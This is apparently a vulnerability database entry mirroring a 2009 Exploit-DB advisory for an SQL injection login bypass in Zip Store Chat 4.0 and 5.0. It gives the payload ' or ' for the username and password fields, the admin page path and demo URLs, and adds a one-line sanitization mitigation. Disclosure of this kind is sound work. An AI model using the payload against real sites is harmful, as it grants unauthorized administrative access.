Zip Store Chat 4.0 + 5.0

vendor:

Chat

by:

ByALBAYX

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Chat

Affected Version From: 4.0

Affected Version To: 5.0

Patch Exists: NO

Related CWE: N/A

CPE: zipstore.com.br

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

A SQL injection vulnerability exists in Zip Store Chat 4.0 and 5.0. An attacker can exploit this vulnerability to gain access to the admin panel by entering ' or ' in the username and password fields. This can be exploited to gain access to the admin panel without authentication.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------
@~~=Author   : ByALBAYX

@~~=Website  : WWW.C4TEAM.ORG
---------------Ooooo-------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)
@~~=======================================~~@
@~~=Script   : Zip Store Chat 4.0 + 5.0

@~~=S.Site   : http://zipstore.com.br
@~~=======================================~~@

@~~=Vul

@~~=http://c4team.org/ [Yol] /admin/index.asp

Login: ' or '

Senha: ' or '

@~~=Demo    : 

@~~=http://zipstore.com.br/chat/4.0/admin/index.asp

@~~=http://zipstore.com.br/chat/5.0/admin/index.asp
@~~=======================================~~@

@~~=:/

# milw0rm.com [2009-06-12]